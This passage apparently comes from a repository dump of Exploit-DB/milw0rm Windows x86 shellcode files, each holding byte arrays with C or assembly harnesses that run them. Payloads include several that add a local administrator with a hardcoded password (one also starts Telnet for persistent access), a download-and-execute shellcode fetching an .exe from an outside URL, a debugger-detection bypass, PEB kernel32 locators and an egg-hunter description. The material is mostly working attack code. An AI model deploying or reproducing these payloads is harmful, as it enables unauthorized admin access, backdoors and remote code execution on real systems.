"\x81\xEB\x11\x11\x11\x11" //sub ebx,0x11111111 45 | "\x81\xC3\xDA\x3F\x1A\x11" //add ebx,0x111a3fda (for seven X86 add ebx,0x1119f7a6) 46 | "\xFF\xD3" //call ebx 47 | "\x81\xC3\x11\x11\x11\x11" //add ebx,0x11111111 48 | "\x81\xEB\x8C\xCC\x18\x11" //sub ebx,0x1118cc8c (for seven X86 sub ebx,0x1114ccd7) 49 | "\xFF\xD3" //call ebx 50 | "\xE8\xDB\xFF\xFF\xFF" //call dword 0x15 51 | //db "cmd" 52 | "\x63\x6d\x64"; 53 | 54 | 55 | int main(int argc, char **argv) { 56 | int *ret; 57 | ret = (int *)&ret + 2; 58 | (*ret) = (int) shellcode; 59 | } -------------------------------------------------------------------------------- /Win_x86/Windows_5_0___7_0_x86_-_Speaking__You_got_pwned!__Null-Free_Shellcode__Shellcode_exploit_for_Win_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | A null-free shellcode for 32-bit versions of Windows 5.0-7.0 all service packs that uses Microsoft Speech API to say "You got pwned!" over the speakers. Includes optional code that fixes stack alignment (adds 5 bytes) and bypasses EAF (adds 29 bytes). 2 | 3 | Features: 4 | 5 | NULL Free 6 | Windows version and service pack independant. 7 | No assumptions are made about the values of registers. 8 | "/3GB" compatible: pointers are not assume to be smaller than 0x80000000. 9 | DEP/ASLR compatible: data is not executed, code is not modified. 10 | Windows 7 compatible: kernel32 is found based on the length of its name 11 | 12 | Download: 13 | https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15879.zip (w32-speaking-shellcode.zip) -------------------------------------------------------------------------------- /Win_x86/Windows_9x_NT_2000_XP_-_PEB_method_Shellcode__29_bytes___Shellcode_exploit_for_Win_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | // 2 | // PEB way of getting kernel32 imagebase by loco. 3 | // Compatible with all Win9x/NT based operating systems. 4 | // 5 | // Gives kernel32 imagebase in eax when executing. 6 | // 29 bytes, only eax/esi used. 7 | // 8 | // Originally discovered by Dino Dai Zovi. 9 | // 10 | // 11 | 12 | #include 13 | 14 | /* 15 | xor eax, eax 16 | add eax, fs:[eax+30h] 17 | js method_9x 18 | 19 | method_nt: 20 | mov eax, [eax + 0ch] 21 | mov esi, [eax + 1ch] 22 | lodsd 23 | mov eax, [eax + 08h] 24 | jmp kernel32_ptr_found 25 | 26 | method_9x: 27 | mov eax, [eax + 34h] 28 | lea eax, [eax + 7ch] 29 | mov eax, [eax + 3ch] 30 | kernel32_ptr_found: 31 | */ 32 | 33 | unsigned char Shellcode[] = 34 | "\x33\xC0" // xor eax, eax 35 | "\x64\x03\x40\x30" // add eax, dword ptr fs:[eax+30] 36 | "\x78\x0C" // js short $+12 37 | "\x8B\x40\x0C" // mov eax, dword ptr [eax+0C] 38 | "\x8B\x70\x1C" // mov esi, dword ptr [eax+1C] 39 | "\xAD" // lodsd 40 | "\x8B\x40\x08" // mov eax, dword ptr [eax+08] 41 | "\xEB\x09" // jmp short $+9 42 | "\x8B\x40\x34" // mov eax, dword ptr [eax+34] 43 | "\x8D\x40\x7C" // lea eax, dword ptr [eax+7C] 44 | "\x8B\x40\x3C" // mov eax, dword ptr [eax+3C] 45 | ; // = 29 bytes. 46 | 47 | int main() 48 | { 49 | printf("Shellcode is %u bytes.\n\n", sizeof(Shellcode)-1); 50 | return 1; 51 | } 52 | 53 | // milw0rm.com [2005-07-26] -------------------------------------------------------------------------------- /Win_x86/Windows_9x_NT_2000_XP_-_PEB_method_Shellcode__31_bytes___Shellcode_exploit_for_Win_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | 004045F4 > 6A 30 PUSH 30 3 | 004045F6 59 POP ECX 4 | 004045F7 64:8B09 MOV ECX,DWORD PTR FS:[ECX] 5 | 004045FA 85C9 TEST ECX,ECX 6 | 004045FC 78 0C JS SHORT OllyTest.0040460A 7 | 004045FE 8B49 0C MOV ECX,DWORD PTR DS:[ECX+C] 8 | 00404601 8B71 1C MOV ESI,DWORD PTR DS:[ECX+1C] 9 | 00404604 AD LODS DWORD PTR DS:[ESI] 10 | 00404605 8B48 08 MOV ECX,DWORD PTR DS:[EAX+8] 11 | 00404608 EB 09 JMP SHORT OllyTest.00404613 12 | 0040460A 8B49 34 MOV ECX,DWORD PTR DS:[ECX+34] 13 | 0040460D 8B49 7C MOV ECX,DWORD PTR DS:[ECX+7C] 14 | 00404610 8B49 3C MOV ECX,DWORD PTR DS:[ECX+3C] 15 | */ 16 | 17 | /* 18 | 31 byte C PEB kernel base location method works on win9x-win2k3 19 | no null bytes, so no need to xor. 20 | 21 | -twoci 22 | */ 23 | 24 | unsigned char PEBCode[] = 25 | {"\x6A\x30" 26 | "\x59" 27 | "\x64\x8B\x09" 28 | "\x85\xC9" 29 | "\x78\x0C" 30 | "\x8B\x49\x0C" 31 | "\x8B\x71\x1C" 32 | "\xAD" 33 | "\x8B\x48\x08" 34 | "\xEB\x09" 35 | "\x8B\x49\x34" 36 | "\x8B\x49\x7C" 37 | "\x8B\x49\x3C"}; 38 | 39 | int main( int argc, char *argv[] ) 40 | { 41 | printf( "sizeof(PEBCode) = %u\n", sizeof(PEBCode) ); 42 | return 0; 43 | } 44 | 45 | // milw0rm.com [2005-01-26] -------------------------------------------------------------------------------- /Win_x86/Windows_9x_NT_2000_XP_-_PEB_method_Shellcode__35_bytes___Shellcode_exploit_for_Win_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /*This is a 35 byte C implementation of the use of the PEB method to get 2 | *the kernel32 base address on Windows. This is generic code designed to 3 | *run on both Windows 9x and NT based systems. The code has been optimized 4 | *to not have any 00h bytes so that you wont have to use an XOR routine to 5 | *encode the shellcode. I used relative jumps and xor tricks to avoid the 6 | *00h bytes and make the code as small as I could get it. Feel free to use 7 | *this source in anything that you want. 8 | */ 9 | 10 | 11 | /* 35 byte PEB method for Windows 9x/NT/2k/XP 12 | * 0x00 byte optimized, no XOR routine required. 13 | * 14 | * www.4x10m.com 15 | * oc.192 16 | * irc.4x10m.net #4x10m 17 | */ 18 | 19 | unsigned char shellcode[] = 20 | /* 35 byte PEB - 00h removal and size optimized */ 21 | /* 22 - 24 total clock cycles on a x486 */ 22 | "\x31\xC0" /* xor eax, eax */ 23 | "\x31\xD2" /* xor edx, edx */ 24 | "\xB2\x30" /* mov dl, 30h */ 25 | "\x64\x8B\x02" /* mov eax, [fs:edx] */ /* PEB base address */ 26 | "\x85\xC0" /* test eax, eax */ 27 | "\x78\xC0" /* js 0Ch */ 28 | "\x8B\x40\x0C" /* mov eax, [eax+0Ch] */ /* NT kernel32 routine */ 29 | "\x8B\x70\x1C" /* mov esi, [eax+1Ch] */ 30 | "\xAD" /* lodsd */ 31 | "\x8B\x40\x08" /* mov eax, [eax+08h] */ 32 | "\xEB\x07" /* jmp short 09h */ 33 | "\x8B\x40\x34" /* mov eax, [eax+34h] */ /* 9x kernel32 routine */ 34 | "\x8D\x40\x7C" /* lea eax, [eax+7Ch] */ 35 | "\x8D\x40\x3C" /* mov eax, [eax+3Ch] */ 36 | ; 37 | 38 | int main(int argc, char *argv[]) { 39 | //void (*sc)() = (void *)shellcode; 40 | printf("len:%d\n", sizeof(shellcode)); 41 | //sc(); 42 | return 0; 43 | } 44 | 45 | // milw0rm.com [2005-01-09] -------------------------------------------------------------------------------- /Win_x86/Windows_NT_2000_XP__Russian__-_Add_Administartor_User__slim_shady__Shellcode__318_bytes___Shellcode_exploit_for_Win_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | \ win32 useradd shellcode for russian systems 3 | / by Darkeagle 4 | \ ExploiterZ Lab 5 | / http://exploiterz.org 6 | \ 7 | */ 8 | 9 | // add user "slim" with password "shady" with admin prem. in Russian Systems 10 | unsigned char data[318] = { 11 | 0xEB, 0x0F, 0x58, 0x80, 0x30, 0x17, 0x40, 0x81, 0x38, 0x6D, 0x61, 0x7A, 0x61, 0x75, 0xF4, 0xEB, 12 | 0x05, 0xE8, 0xEC, 0xFF, 0xFF, 0xFF, 0xFE, 0xB6, 0x17, 0x17, 0x17, 0x4A, 0x42, 0x26, 0xCC, 0x73, 13 | 0x9C, 0x14, 0x57, 0x84, 0x9C, 0x54, 0xE8, 0x57, 0x62, 0xEE, 0x9C, 0x44, 0x14, 0x71, 0x26, 0xC5, 14 | 0x71, 0xAF, 0x17, 0x07, 0x71, 0x96, 0x2D, 0x5A, 0x4D, 0x63, 0x13, 0x3E, 0xD5, 0xFC, 0xE2, 0x9E, 15 | 0xC4, 0x9C, 0x6D, 0x2B, 0x16, 0xC0, 0x14, 0x48, 0x6F, 0x9C, 0x5C, 0x0F, 0x9C, 0x64, 0x37, 0x9C, 16 | 0x6C, 0x33, 0x16, 0xC1, 0x16, 0xC0, 0xEB, 0xBA, 0x16, 0xC7, 0x81, 0x90, 0xEA, 0x46, 0x26, 0xDE, 17 | 0x97, 0xD6, 0x18, 0xE4, 0xB1, 0x65, 0x1D, 0x81, 0x4E, 0x90, 0xEA, 0x63, 0x18, 0x50, 0x50, 0xF5, 18 | 0xF1, 0xA9, 0x18, 0x17, 0x17, 0x17, 0x3E, 0xD9, 0x3E, 0xE0, 0xFC, 0xFC, 0x26, 0xD7, 0x71, 0x9C, 19 | 0x10, 0xD6, 0xF7, 0x15, 0x9C, 0x64, 0x0B, 0x16, 0xC1, 0x16, 0xD1, 0xBA, 0x16, 0xC7, 0x9E, 0xD1, 20 | 0x9E, 0xC0, 0x4A, 0x9A, 0x92, 0x0B, 0x17, 0x17, 0x17, 0x47, 0x40, 0xE8, 0xC1, 0x7F, 0x12, 0x17, 21 | 0x17, 0x17, 0x9A, 0x9A, 0x27, 0x17, 0x17, 0x17, 0x46, 0xE8, 0xC7, 0x9A, 0x92, 0x33, 0x17, 0x17, 22 | 0x17, 0x47, 0x40, 0xE8, 0xC1, 0x7F, 0x17, 0x17, 0x17, 0x17, 0xE8, 0xC7, 0xFF, 0x4D, 0xE8, 0xE8, 23 | 0xE8, 0x50, 0x72, 0x63, 0x47, 0x65, 0x78, 0x74, 0x56, 0x73, 0x73, 0x65, 0x72, 0x64, 0x64, 0x17, 24 | 0x5B, 0x78, 0x76, 0x73, 0x5B, 0x7E, 0x75, 0x65, 0x76, 0x65, 0x6E, 0x56, 0x17, 0x40, 0x7E, 0x79, 25 | 0x52, 0x6F, 0x72, 0x74, 0x17, 0x52, 0x6F, 0x7E, 0x63, 0x47, 0x65, 0x78, 0x74, 0x72, 0x64, 0x64, 26 | 0x17, 0x74, 0x7A, 0x73, 0x37, 0x38, 0x74, 0x37, 0x79, 0x72, 0x63, 0x37, 0x62, 0x64, 0x72, 0x65, 27 | 0x37, 0x38, 0x76, 0x73, 0x73, 0x37, 0x64, 0x7B, 0x7E, 0x7A, 0x37, 0x64, 0x7F, 0x76, 0x73, 0x6E, 28 | 0x31, 0x31, 0x79, 0x72, 0x63, 0x37, 0x7B, 0x78, 0x74, 0x76, 0x7B, 0x70, 0x65, 0x78, 0x62, 0x67, 29 | 0x37, 0x38, 0x76, 0x73, 0x73, 0x37, 0xF7, 0xF3, 0xFB, 0xFF, 0xFA, 0xFF, 0xE6, 0xE5, 0xE7, 0xF7, 30 | 0xE5, 0xF9, 0xE7, 0xEC, 0x37, 0x64, 0x7B, 0x7E, 0x7A, 0x17, 0x6D, 0x61, 0x7A, 0x61 31 | }; 32 | 33 | int main() 34 | { 35 | 36 | void (*c0d3)(); 37 | printf("Win32 \"adduser shellcode\"\n"); 38 | *(int*)&c0d3 = data; 39 | c0d3(); 40 | } 41 | 42 | // milw0rm.com [2005-10-28] -------------------------------------------------------------------------------- /Win_x86/Windows_NT_XP_x86_-_IsDebuggerPresent_Shellcode__39_bytes___Shellcode_exploit_for_Win_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* Shellcode Length: 39 bytes */ 2 | /* sets PEB->BeingDebugged to 0 */ 3 | /* IsDebuggerPresent()/BeingDebugged bypass */ 4 | /* by ex-pb @ screw_you@web.de */ 5 | /* greets: xgx and all i forgot */ 6 | 7 | #include 8 | #include 9 | 10 | char ShellCode[] = "\xEB" 11 | "\x0F\x58\x80\x30\x95\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF" 12 | "\xFF\xF1\x34\xA5\x95\x95\x95\xAB\x53\xD5\x97\x95\x56\x68\x61\x63\x6B\xCD"; 13 | 14 | int main() 15 | { 16 | printf("Shellcode length: %d\n", strlen(ShellCode)); 17 | return 0; 18 | } 19 | 20 | // milw0rm.com [2007-05-31] -------------------------------------------------------------------------------- /Win_x86/Windows_PerfectXp-pc1_SP3_x86__Turkish__-_Add_Administrator_User__kpss_12345__Shellcode__112_bytes___Shellcode_exploit_for_Win_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | # Title : win32/PerfectXp-pc1/sp3 (Tr) Add Admin Shellcode 112 bytes 2 | # Author : KaHPeSeSe 3 | # Screenshot : http://i53.tinypic.com/289yamq.jpg 4 | # Desc. : usr: kpss , pass: 12345 , localgroup: Administrator 5 | # Tested on : PERFECT XP PC1 / SP3 6 | # Date : 18/07/2011 7 | # Not : a.q kpss :(( 8 | 9 | #include 10 | #include 11 | #include 12 | 13 | int main(){ 14 | 15 | unsigned char shellcode[]= 16 | "\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x4e\x53\xbb\x0d\x25\x86\x7c" 17 | "\xff\xd3\x31\xc0\x50\xbb\x12\xcb\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff" 18 | "\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73" 19 | "\x65\x72\x20\x6b\x70\x73\x73\x20\x31\x32\x33\x34\x35\x20\x2f\x61\x64" 20 | "\x64\x20\x26\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f" 21 | "\x75\x70\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73" 22 | "\x20\x2f\x61\x64\x64\x20\x6b\x70\x73\x73"; 23 | 24 | printf("Size = %d bytes\n", strlen(shellcode)); 25 | 26 | ((void (*)())shellcode)(); 27 | 28 | 29 | 30 | return 0; 31 | } -------------------------------------------------------------------------------- /Win_x86/Windows_SP1_SP2_x86_-_Beep_Shellcode__35_bytes___Shellcode_exploit_for_Win_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | Shellcode can be changed to work with any windows distribution by changing the address of Beep in kernel32.dll 3 | Addresses for SP1 and SP2 4 | 5 | -xnull 6 | */ 7 | 8 | #include 9 | 10 | unsigned char beepsp1[] = 11 | "\x55\x89\xE5\x83\xEC\x18\xC7\x45\xFC" 12 | "\x10\xC9\xEA\x77" //Address \x10\xC9\xEA\x77 = SP1 13 | "\xC7\x44\x24\x04" 14 | "\xE8\x03" //Length \xE8\x03 = 1000 (1 second) 15 | "\x00\x00\xC7\x04\x24" 16 | "\xE8\x03" //Frequency \xE8\x03 = 1000 17 | "\x00\x00\x8B\x45\xFC\xFF\xD0\xC9\xC3"; 18 | 19 | unsigned char beepsp2[] = 20 | "\x55\x89\xE5\x83\xEC\x18\xC7\x45\xFC" 21 | "\x53\x8A\x83\x7C" //Address \x53\x8A\x83\x7C = SP2 22 | "\xC7\x44\x24\x04" 23 | "\xD0\x03" //Length \xD0\x03 = 2000 (2 seconds) 24 | "\x00\x00\xC7\x04\x24" 25 | "\x01\x0E" //Frequency \x01\x0E = 3585 26 | "\x00\x00\x8B\x45\xFC\xFF\xD0\xC9\xC3"; 27 | 28 | int main() 29 | { 30 | void (*function)(); 31 | *(long*)&function = (long)beepsp1; 32 | function(); 33 | } 34 | 35 | // milw0rm.com [2006-04-14] -------------------------------------------------------------------------------- /Win_x86/Windows_XP_Home_SP2__English__-_calc_exe_Shellcode__37_bytes___Shellcode_exploit_for_Win_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Windows Xp Home edition SP2 english ( calc.exe ) 37 bytes shellcode 3 | * by: Hazem mofeed Aka Hakxer 4 | * penetration testing labs 5 | * www.pentestlabs.com 6 | */ 7 | 8 | char evil[] = 9 | "\xeb\x16\x5b\x31\xc0\x50\x53\xbb\x8d\x15\x86\x7c\xff\xd3\x31\xc0" 10 | "\x50\xbb\xea\xcd\x81\x7c\xff\xd3\xe8\xe5\xff\xff\xff\x63\x61\x6c" 11 | "\x63\x2e\x65\x78\x65\x00"; 12 | 13 | int main(int argc, char **argv) 14 | { 15 | int (*shellcode)(); 16 | shellcode = (int (*)()) evil; 17 | (int)(*shellcode)(); 18 | } -------------------------------------------------------------------------------- /Win_x86/Windows__Net_Framework_x86_-_Execute_Native_x86_Shellcode__Shellcode_exploit_for_Win_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | # Exploit Title: .Net framework execute native x86 shellcode 2 | # Date: May. 2nd 2016 3 | # Exploit Author: Jacky5112  4 | # Software Link: https://github.com/jacky5112/ShellCodeTest_Version_1.0 5 | # Version: 1.0 6 | # Tested on: Windows 7 | # CVE : (none) 8 | 9 | https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39754.zip -------------------------------------------------------------------------------- /Win_x86/Windows_x86_-_Add_Administrator_User__GAZZA_123456__+_Start_Telnet_Service_Shellcode__111_bytes___Shellcode_exploit_for_Win_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | ; payload:add admin acount & Telnet Listening 2 | ; Author: DATA_SNIPER 3 | ; size:111 bytes 4 | ; platform:WIN32/XP SP2 FR 5 | ; thanks:Arab4services team & AT4RE Team 6 | ; more info: visit my blog http://datasniper.arab4services.net 7 | ; The Sh3llcode: 8 | ; "\xEB\x08\xBA\x4D\x11\x86\x7C\xFF\xD2\xCC\xE8\xF3\xFF\xFF\xFF\x63\x6D\x64\x20\x2F\x63" 9 | ; "\x20\x6E\x65\x74\x20\x75\x73\x65\x72\x20\x68\x69\x6C\x6C\x20\x31\x32\x33\x34\x35" 10 | ; "\x36\x20\x2F\x41\x44\x44\x20\x26\x26\x20\x6E\x65\x74\x20\x6C\x6F\x63\x61\x6C\x67" 11 | ; "\x72\x6F\x75\x70\x20\x41\x64\x6D\x69\x6E\x69\x73\x74\x72\x61\x74\x65\x75\x72\x73" 12 | ; "\x20\x68\x69\x6C\x6C\x20\x2F\x41\x44\x44\x20\x26\x26\x20\x73\x63\x20\x73\x74\x61" 13 | ; "\x72\x74\x20\x54\x6C\x6E\x74\x53\x76\x72\x00" 14 | ; Description: it's simular to TCP BindShell on port 23,throught Command execution we can get shell access throught telnet service on Windows b0x. 15 | ; Add admin account command user=GAZZA ,pass=123456 :cmd /c net user GAZZA 123456 /ADD && net localgroup Administrateurs GAZZA /ADD 16 | ; Start telnet service: sc start TlntSvr 17 | ; For saving ur access to the B0x again and again :),u can use this command: 18 | ; "sc config TlntSvr start= auto & sc start TlntSvr" instead of: 19 | ; "sc start TlntSvr" 20 | ; NASM -s -fbin telnetbind.asm 21 | BITS 32 22 | db 0EBh,08h ;such as "jmp Data" ,i puted it in opcode format for avoiding null problem. 23 | Exec: 24 | MOV EDX,7C86114Dh ;WinExec addr in WIN XP SP2 FR 25 | CALL EDX 26 | INT3 ;just interrupter (hung the shellcode after it do his job,any way u can use ExitProcess) for avoiding infinite loop 27 | Data: 28 | CALL Exec 29 | db 'cmd /c net user GAZZA 123456 /ADD & net localgroup Administrateurs GAZZA /ADD & sc start TlntSvr',00h 30 | ;add user GAZA with 123456 password and start telnet service ;BTW the exstension cuted for saving som byte ;) 31 | 32 | ; milw0rm.com [2009-02-27] -------------------------------------------------------------------------------- /Win_x86/Windows_x86_-_Add_Local_Administrator_User__secuid0_m0nk__Shellcode__326_bytes___Shellcode_exploit_for_Win_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | Title: generic win32 - add new local administrator 326 bytes 3 | Author: Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com 4 | Method: Dynamic opcode, encoded shellcode 5 | Tested on: WinXP Pro SP3 (EN) 32bit - Build 2600.100427-1636 and Build 2600.080413-2111 6 | Greetz: offsec team, inj3ct0r team, hdm 7 | */ 8 | #include 9 | #include 10 | #include 11 | 12 | char code[] = 13 | "\xda\xde\xd9\x74\x24\xf4\xb8\x22\xd2\x27\x7a\x29\xc9\xb1\x4b" 14 | "\x5b\x31\x43\x1a\x83\xeb\xfc\x03\x43\x16\xe2\xd7\x3b\xbc\x7a" 15 | "\x17\xbc\x95\x4b\xd7\xd8\x92\xec\xe7\xa5\x65\x94\x08\x2d\x25" 16 | "\x69\x9d\x41\xba\xdc\x2a\xe1\xca\xf7\x25\xe2\xca\x07\xbe\xa2" 17 | "\xfe\x8a\x80\x5e\x74\xd4\x3c\xc1\x49\xb5\xb7\x91\x69\x12\x4c" 18 | "\x2c\x4e\xd1\x06\xaa\xd6\xe4\x4c\x3f\x6c\xff\x1b\x1a\x51\xfe" 19 | "\xf0\x78\xa5\x49\x8d\x4b\x4d\x48\x7f\x82\xae\x7a\xbf\x19\xfc" 20 | "\xf9\xff\x96\xfa\xc0\x30\x5b\x04\x04\x25\x90\x3d\xf6\x9d\x71" 21 | "\x37\xe7\x56\xdb\x93\xe6\x83\xba\x50\xe4\x18\xc8\x3d\xe9\x9f" 22 | "\x25\x4a\x15\x14\xb8\xa5\x9f\x6e\x9f\x29\xc1\xad\x72\x01\x53" 23 | "\xd9\x27\x5d\xac\xe6\xb1\xa5\xd2\xdc\xca\xa9\xd4\xdc\x4b\x6e" 24 | "\xd0\xdc\x4b\x71\xe0\x12\x3e\x97\xd1\x42\xd8\x57\xd6\x92\x43" 25 | "\xa9\x5c\x9c\x0d\x8e\x83\xd3\x70\xc2\x4c\x13\x73\x1b\xc4\xf6" 26 | "\x9b\x43\x29\x07\xa4\xfd\x17\x1c\xb9\xa0\x1a\x9f\x3a\xd4\xd4" 27 | "\xde\x82\xee\x16\xe0\x04\x07\xa0\x1f\xfb\x28\x26\xd1\x5f\xe6" 28 | "\x79\xbd\x0c\xf7\x2f\x39\x82\xc7\x80\xbe\xb1\xcf\xc8\xad\xc5" 29 | "\x2f\xf7\x4e\x57\xb4\x26\xf5\xdf\x51\x17\xda\x7c\xba\x39\x41" 30 | "\xf7\x9a\xb0\xfa\x92\xa8\x1a\x8f\x39\x2e\x2e\x06\xa6\x80\xf0" 31 | "\xb5\x16\x8f\x9b\x65\x78\x2e\x38\x01\xa6\x96\xe6\xe9\xc8\xb3" 32 | "\x92\xc9\x78\x53\x38\x68\xed\xcc\xcc\x05\x98\x62\x11\xb8\x06" 33 | "\xee\x38\x54\xae\x83\xce\xda\x51\x10\x40\x68\xe1\xf8\xed\xe9" 34 | "\x66\x8c\x78\x95\x58\x4e\x54\x34\xfd\xea\xaa"; 35 | 36 | int main(int argc, char **argv) 37 | { 38 | ((void (*)())code)(); 39 | printf("New local admin \tUsername: secuid0\n\t\t\tPassword: m0nk"); 40 | return 0; 41 | } -------------------------------------------------------------------------------- /Win_x86/Windows_x86_-_Command_WinExec___Shellcode__104+_bytes___Shellcode_exploit_for_Win_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | ; 2 | ; relocateable dynamic runtime assembly code example using hash lookup 3 | ; 4 | ; WinExec() with ExitThread() 5 | ; 104 bytes 6 | ; 7 | ; for testing: 8 | ; 9 | ; ml /c /coff /Cp wexec2.asm 10 | ; link /subsystem:windows /section:.text,w wexec2.obj 11 | ; 12 | ; wyse101 [at] gmail.com 13 | ; 14 | ; October 2006 15 | ; 16 | .386 17 | .model flat,stdcall 18 | 19 | ROL_CONSTANT equ 5 20 | 21 | mrol macro iNum:req,iBits:req 22 | exitm <(iNum shl iBits) or (iNum shr (32-iBits))> 23 | endm 24 | 25 | mror macro iNum:req,iBits:req 26 | exitm <(iNum shr iBits) or (iNum shl (32-iBits))> 27 | endm 28 | 29 | hashapi macro szApi 30 | local dwApi 31 | 32 | dwApi = 0 33 | 34 | forc x,szApi 35 | dwApi = dwApi + '&x' 36 | dwApi = mrol(dwApi,ROL_CONSTANT) 37 | endm 38 | dwApi = mrol(dwApi,ROL_CONSTANT) 39 | dw (dwApi and 0ffffh) 40 | endm 41 | 42 | .code 43 | 44 | assume fs:nothing 45 | 46 | code_start: 47 | jmp load_data 48 | setup_parameters: 49 | pop ebp 50 | xor ecx,ecx 51 | push ecx ; ExitThread() exitcode 52 | push ecx ; SW_HIDE 53 | mov cl,(cmd_end-api_hashes) ; limit of 255 bytes per command 54 | inc byte ptr[ebp+ecx] 55 | lea eax,[ebp+(cmd_string-api_hashes)] 56 | push eax ; WinExec command string 57 | get_k32_base: 58 | mov cl,30h 59 | mov eax,fs:[ecx] 60 | mov eax,[eax+0ch] 61 | mov esi,[eax+1ch] 62 | lodsd 63 | mov ebx,[eax+08h] 64 | get_api_loop: 65 | mov eax,[ebx+3ch] 66 | mov eax,[ebx+eax+78h] 67 | lea esi,[ebx+eax+1ch] 68 | mov cl,3 69 | load_rva: 70 | lodsd 71 | add eax,ebx 72 | push eax 73 | loop load_rva 74 | pop ebp 75 | pop edi 76 | load_api: 77 | mov esi,[edi+4*ecx] 78 | add esi,ebx 79 | xor eax,eax 80 | cdq 81 | hash_api: 82 | lodsb 83 | add edx,eax 84 | rol edx,ROL_CONSTANT 85 | dec eax 86 | jns hash_api 87 | inc ecx 88 | mov eax,[esp+4] 89 | cmp dx,word ptr[eax] 90 | jne load_api 91 | pop eax 92 | movzx edx,word ptr[ebp+2*ecx-2] 93 | add ebx,[eax+4*edx] 94 | pop esi 95 | call ebx 96 | lodsw 97 | jmp get_k32_base 98 | load_data: 99 | call setup_parameters 100 | api_hashes: 101 | hashapi 102 | hashapi 103 | code_end: 104 | 105 | cmd_string db 'cmd /c echo hello,world>test.txt && notepad test.txt',0ffh 106 | cmd_end equ $-1 107 | 108 | end code_start 109 | 110 | ; milw0rm.com [2006-01-24] -------------------------------------------------------------------------------- /Win_x86/Windows_x86_-_Download_File__http:__www_ph4nt0m_org_a_exe__+_Execute__C:_a_exe__Shellcode__226+_bytes___Shellcode_exploit_for_Win_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | \ ______________________WIN_SHELLCODE__________________________ 3 | / :: win32 download & exec shellcode :: 4 | \ :: by Darkeagle of Unl0ck Research Team [http://exploiterz.org] :: 5 | / :: to avoid 0x00 use ^^xor^^ }:> :: 6 | \ :: greets goes to: Sowhat, 0x557 guys, 55k7 guys, RST/GHC guys. :: 7 | / ::_____________________________cya______________________________:: 8 | \ 9 | */ 10 | 11 | 12 | #include 13 | #include 14 | 15 | unsigned char sh4llcode[] = 16 | "\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03" 17 | "\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74" 18 | "\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E" 19 | "\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03" 20 | "\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C" 21 | "\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40" 22 | "\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C" 23 | "\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC" 24 | "\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F" 25 | "\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB" 26 | "\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83" 27 | "\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF" 28 | "\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF" 29 | "http://h0nest.org/1.exe"; 30 | 31 | int main() 32 | { 33 | 34 | void (*c0de)(); 35 | printf("Win32 \"download & exec shellcode\"\n"); 36 | *(int*)&c0de = sh4llcode; 37 | c0de(); 38 | } 39 | 40 | // milw0rm.com [2005-12-23] -------------------------------------------------------------------------------- /Win_x86/Windows_x86_-_Egg_Omelet_SEH_Shellcode__Shellcode_exploit_for_Win_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | A small piece of shellcode written in assembler that can scan the user-land 2 | address space for small blocks of memory ("eggs") and recombine the eggs into 3 | one large block. When done, the large block is executed. This is useful when you 4 | can only insert small blocks at random locations into a process and not one 5 | contiguous large block containing your shellcode in one piece: this code will 6 | recombine the eggs to create your shellcode in the process and execute it. 7 | 8 | This version works only on Windows 32-bit platforms because it uses the Windows 9 | specific Structured Exception Handler (SEH) feature to handle access violations 10 | caused by scanning memory. 11 | 12 | More details can be found here: 13 | 14 | http://skypher.com/wiki/index.php?title=Shellcode/w32_SEH_omelet_shellcode 15 | http://code.google.com/p/w32-seh-omelet-shellcode/ 16 | backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/13507-1.zip (2009-w32-SEH-omlet-shellcode-v0.2.zip) 17 | backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/13507-2.zip (2009-w32-SEH-omlet-shellcode-older-versions.zip) 18 | 19 | I have not had a chance to test this newer version in a 